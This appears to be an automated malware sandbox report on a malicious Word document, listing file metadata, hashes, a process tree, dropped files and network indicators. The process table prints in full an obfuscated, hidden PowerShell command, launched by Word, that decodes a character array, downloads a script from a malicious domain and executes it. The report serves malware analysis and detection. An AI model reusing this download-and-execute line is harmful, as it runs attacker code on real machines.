File name: | IT296535583423900645280811.doc |
Full analysis: | https://app.any.run/tasks/bb0d72d4-ad69-4b85-b200-654d59ef947d |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 13:39:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Wed Sep 25 23:02:00 2019, Last Saved Time/Date: Mon Sep 30 18:50:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | C0819DBC62DA5462C93D22130070E167 |
SHA1: | B156F634D365FB7CF88EFCA8A2AB4C7C5320E3A4 |
SHA256: | 7AAC43C817B2E4A16EDF0051921E70816CF5797F93DBB2E3D6D42A104E2E2505 |
SSDEEP: | 768:wC3hskfJyrnl5SuxelIylxLPHJ2DvhZImJhHi/o5Zbtxw+tBGiIfJj:wC3hskRSSuclIyTPHkDD+WZbtxrt4f |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:09:30 17:50:00 |
CreateDate: | 2019:09:25 22:02:00 |
TotalEditTime: | 3.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 4 |
LastModifiedBy: | Administrator |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Administrator |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2792 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\IT296535583423900645280811.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4040 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c function a($a){ return [char]$a; };$cwvc=''; 36,97,61,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,39,104,116,116,112,58,47,47,104,111,109,101,46,104,111,112,101,100,97,121,98,111,111,107,46,99,111,109,47,63,110,101,101,100,61,57,102,53,98,57,101,101,38,118,105,100,61,100,112,101,99,49,38,51,57,56,48,57,39,41,59,105,101,120,32,36,97,59|%{$ijufa=a($_);$cwvc+=$ijufa};iex $cwvc; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2792 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4DFE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4040 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UYH56RDHTBUH53OWTTZN.temp | — | |
MD5:— | SHA256:— | |||
4040 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:C911F7DBBF8956A476A7162FD7A88B15 | SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85 | |||
2792 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$296535583423900645280811.doc | pgc | |
MD5:4C9734D221D7D756F4E2CA18DF77413A | SHA256:88AEC9CA9458F61EEC0A31466C87B4EA642EBA470166C2CB7077986C22EEC125 | |||
2792 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0F0C08535A64B51F025E968156938DCB | SHA256:5D034F9BE7A28E3BC52FB7F0AB9CCC128625A6973977286B895AF12E5E2283A0 | |||
4040 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1156e7.TMP | binary | |
MD5:C911F7DBBF8956A476A7162FD7A88B15 | SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4040 | powershell.exe | GET | — | 185.189.149.169:80 | http://home.hopedaybook.com/?need=9f5b9ee&vid=dpec1&39809 | CH | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4040 | powershell.exe | 185.189.149.169:80 | home.hopedaybook.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
home.hopedaybook.com |
| malicious |